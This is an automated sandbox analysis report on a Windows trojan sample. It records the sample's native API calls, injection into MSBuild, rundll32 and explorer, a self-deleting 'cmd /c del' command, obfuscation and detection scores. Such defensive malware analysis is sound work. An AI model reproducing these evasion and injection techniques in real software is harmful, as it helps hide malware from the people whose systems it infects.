Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00EFB150 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 04A2B150 appears 35 times
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041A350 NtCreateFile, 14_2_0041A350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041A400 NtReadFile, 14_2_0041A400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041A480 NtClose, 14_2_0041A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041A530 NtAllocateVirtualMemory, 14_2_0041A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041A34A NtCreateFile, 14_2_0041A34A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041A3FD NtReadFile, 14_2_0041A3FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041A3A2 NtCreateFile,NtReadFile, 14_2_0041A3A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F398F0 NtReadVirtualMemory,LdrInitializeThunk, 14_2_00F398F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_00F39860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39840 NtDelayExecution,LdrInitializeThunk, 14_2_00F39840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F399A0 NtCreateSection,LdrInitializeThunk, 14_2_00F399A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_00F39910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39A50 NtCreateFile,LdrInitializeThunk, 14_2_00F39A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39A20 NtResumeThread,LdrInitializeThunk, 14_2_00F39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39A00 NtProtectVirtualMemory,LdrInitializeThunk, 14_2_00F39A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F395D0 NtClose,LdrInitializeThunk, 14_2_00F395D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39540 NtReadFile,LdrInitializeThunk, 14_2_00F39540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F396E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_00F396E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_00F39660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F397A0 NtUnmapViewOfSection,LdrInitializeThunk, 14_2_00F397A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39780 NtMapViewOfSection,LdrInitializeThunk, 14_2_00F39780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39710 NtQueryInformationToken,LdrInitializeThunk, 14_2_00F39710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F398A0 NtWriteVirtualMemory, 14_2_00F398A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F3B040 NtSuspendThread, 14_2_00F3B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39820 NtEnumerateKey, 14_2_00F39820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F399D0 NtCreateProcessEx, 14_2_00F399D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39950 NtQueueApcThread, 14_2_00F39950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39A80 NtOpenDirectoryObject, 14_2_00F39A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39A10 NtQuerySection, 14_2_00F39A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F3A3B0 NtGetContextThread, 14_2_00F3A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39B00 NtSetValueKey, 14_2_00F39B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F395F0 NtQueryInformationFile, 14_2_00F395F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39560 NtWriteFile, 14_2_00F39560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F3AD30 NtSetContextThread, 14_2_00F3AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39520 NtWaitForSingleObject, 14_2_00F39520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F396D0 NtCreateKey, 14_2_00F396D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39670 NtQueryInformationProcess, 14_2_00F39670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39650 NtQueryValueKey, 14_2_00F39650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39610 NtEnumerateValueKey, 14_2_00F39610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39FE0 NtCreateMutant, 14_2_00F39FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39770 NtSetInformationFile, 14_2_00F39770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F3A770 NtOpenThread, 14_2_00F3A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39760 NtOpenProcess, 14_2_00F39760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F39730 NtQueryVirtualMemory, 14_2_00F39730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F3A710 NtOpenProcessToken, 14_2_00F3A710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69860 NtQuerySystemInformation,LdrInitializeThunk, 19_2_04A69860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69840 NtDelayExecution,LdrInitializeThunk, 19_2_04A69840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A699A0 NtCreateSection,LdrInitializeThunk, 19_2_04A699A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A695D0 NtClose,LdrInitializeThunk, 19_2_04A695D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69910 NtAdjustPrivilegesToken,LdrInitializeThunk, 19_2_04A69910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69540 NtReadFile,LdrInitializeThunk, 19_2_04A69540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A696E0 NtFreeVirtualMemory,LdrInitializeThunk, 19_2_04A696E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A696D0 NtCreateKey,LdrInitializeThunk, 19_2_04A696D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69660 NtAllocateVirtualMemory,LdrInitializeThunk, 19_2_04A69660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69650 NtQueryValueKey,LdrInitializeThunk, 19_2_04A69650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69A50 NtCreateFile,LdrInitializeThunk, 19_2_04A69A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69780 NtMapViewOfSection,LdrInitializeThunk, 19_2_04A69780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69FE0 NtCreateMutant,LdrInitializeThunk, 19_2_04A69FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69710 NtQueryInformationToken,LdrInitializeThunk, 19_2_04A69710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A698A0 NtWriteVirtualMemory, 19_2_04A698A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A698F0 NtReadVirtualMemory, 19_2_04A698F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69820 NtEnumerateKey, 19_2_04A69820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A6B040 NtSuspendThread, 19_2_04A6B040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A695F0 NtQueryInformationFile, 19_2_04A695F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A699D0 NtCreateProcessEx, 19_2_04A699D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69520 NtWaitForSingleObject, 19_2_04A69520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A6AD30 NtSetContextThread, 19_2_04A6AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69560 NtWriteFile, 19_2_04A69560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69950 NtQueueApcThread, 19_2_04A69950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69A80 NtOpenDirectoryObject, 19_2_04A69A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69A20 NtResumeThread, 19_2_04A69A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69A00 NtProtectVirtualMemory, 19_2_04A69A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69610 NtEnumerateValueKey, 19_2_04A69610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69A10 NtQuerySection, 19_2_04A69A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69670 NtQueryInformationProcess, 19_2_04A69670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A697A0 NtUnmapViewOfSection, 19_2_04A697A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A6A3B0 NtGetContextThread, 19_2_04A6A3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69730 NtQueryVirtualMemory, 19_2_04A69730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69B00 NtSetValueKey, 19_2_04A69B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A6A710 NtOpenProcessToken, 19_2_04A6A710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69760 NtOpenProcess, 19_2_04A69760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A69770 NtSetInformationFile, 19_2_04A69770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A6A770 NtOpenThread, 19_2_04A6A770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABA350 NtCreateFile, 19_2_00ABA350
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABA480 NtClose, 19_2_00ABA480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABA400 NtReadFile, 19_2_00ABA400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABA530 NtAllocateVirtualMemory, 19_2_00ABA530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABA3A2 NtCreateFile,NtReadFile, 19_2_00ABA3A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABA3FD NtReadFile, 19_2_00ABA3FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABA34A NtCreateFile, 19_2_00ABA34A
Source: C:\Windows\explorer.exe Code function: 30_2_05959232 NtCreateFile, 30_2_05959232
Source: C:\Windows\explorer.exe Code function: 42_2_05567E12 NtProtectVirtualMemory, 42_2_05567E12
Source: C:\Windows\explorer.exe Code function: 42_2_05566232 NtCreateFile, 42_2_05566232
Source: C:\Windows\explorer.exe Code function: 42_2_05567E0A NtProtectVirtualMemory, 42_2_05567E0A
Abnormal high CPU Usage
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340630386.00000000032D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs H4vBtZsi8xAKaMm.exe
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs H4vBtZsi8xAKaMm.exe
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344847542.0000000007B70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs H4vBtZsi8xAKaMm.exe
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.339243084.0000000000F68000.00000002.00000001.01000000.00000005.sdmp Binary or memory string: OriginalFilename760pQ.exe@ vs H4vBtZsi8xAKaMm.exe
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMajorRevision.exe< vs H4vBtZsi8xAKaMm.exe
Source: H4vBtZsi8xAKaMm.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: H4vBtZsi8xAKaMm.exe Virustotal: Detection: 65%
Source: H4vBtZsi8xAKaMm.exe Metadefender: Detection: 47%
Source: H4vBtZsi8xAKaMm.exe ReversingLabs: Detection: 85%
Source: H4vBtZsi8xAKaMm.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe "C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe"
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path} Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\H4vBtZsi8xAKaMm.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/1@8/3
Source: C:\Windows\explorer.exe File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Mutant created: \Sessions\1\BaseNamedObjects\lPuSWPcuIceRXCxevPdXbrCb
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: *.sln
Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: /ignoreprojectextensions:.sln
Source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: H4vBtZsi8xAKaMm.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: H4vBtZsi8xAKaMm.exe Static file information: File size 1304576 > 1048576
Source: H4vBtZsi8xAKaMm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: H4vBtZsi8xAKaMm.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x134400
Source: H4vBtZsi8xAKaMm.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: H4vBtZsi8xAKaMm.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jpRHjxHGRl\src\obj\Debug\760pQ.pdb source: H4vBtZsi8xAKaMm.exe
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000E.00000002.401789434.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.338982256.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.401925029.0000000000FEF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.800187501.0000000004B1F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.799896535.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.402164809.00000000046D0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000E.00000002.401789434.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.338982256.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.401925029.0000000000FEF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000013.00000002.800187501.0000000004B1F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.799896535.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.402164809.00000000046D0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: MSBuild.exe, 0000000E.00000002.402970903.0000000002B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: MSBuild.exe, 0000000E.00000002.402970903.0000000002B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Code function: 1_2_00E3612B push es; retn 0000h 1_2_00E36133
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Code function: 1_2_00E38A39 push cs; retf 1_2_00E38D4A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00416997 push 00000053h; retf 14_2_00416999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00417A42 push edi; retf 14_2_00417A43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0040E2B6 pushfd ; retf 14_2_0040E2BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041D4F2 push eax; ret 14_2_0041D4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041D4FB push eax; ret 14_2_0041D562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041D4A5 push eax; ret 14_2_0041D4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041D55C push eax; ret 14_2_0041D562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00417658 push esi; ret 14_2_00417721
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F4D0D1 push ecx; ret 14_2_00F4D0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A7D0D1 push ecx; ret 19_2_04A7D0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AB6997 push 00000053h; retf 19_2_00AB6999
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AAE2B6 pushfd ; retf 19_2_00AAE2BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AB7A42 push edi; retf 19_2_00AB7A43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABD4A5 push eax; ret 19_2_00ABD4F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABD4FB push eax; ret 19_2_00ABD562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABD4F2 push eax; ret 19_2_00ABD4F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABD55C push eax; ret 19_2_00ABD562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AB7658 push esi; ret 19_2_00AB7721
Source: C:\Windows\explorer.exe Code function: 30_2_0595C9B5 push esp; retn 0000h 30_2_0595CAE7
Source: C:\Windows\explorer.exe Code function: 30_2_0595CB1E push esp; retn 0000h 30_2_0595CB1F
Source: C:\Windows\explorer.exe Code function: 30_2_0595CB02 push esp; retn 0000h 30_2_0595CB03
Source: C:\Windows\explorer.exe Code function: 42_2_05569B1E push esp; retn 0000h 42_2_05569B1F
Source: C:\Windows\explorer.exe Code function: 42_2_05569B02 push esp; retn 0000h 42_2_05569B03
Source: C:\Windows\explorer.exe Code function: 42_2_055699B5 push esp; retn 0000h 42_2_05569AE7
Source: initial sample Static PE information: section name: .text entropy: 7.91694602687

Hooking and other Techniques for Hiding and Protection
barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
